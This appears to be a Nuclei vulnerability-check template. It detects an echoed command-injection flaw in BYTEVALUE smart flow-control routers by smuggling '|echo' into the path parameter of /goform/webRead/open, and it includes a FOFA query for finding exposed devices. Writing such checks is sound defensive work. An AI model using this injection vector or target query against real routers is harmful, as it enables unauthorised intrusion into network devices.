id: BaiWei-ECE

info:
  name: 百为智能流控路由器存在命令执行漏洞
  author: changge
  severity: high
  description: 百为智能流控路由器/goform/webRead/open 路由的 ?path 参数存在有回显的命令注入漏洞。
  metadata:
    fofa-query: title="BYTEVALUE 智能流控路由器"

http:
  - raw:
      - |
        GET /goform/webRead/open/?path=|echo%20%22123456%22 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 127


    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"123456")'
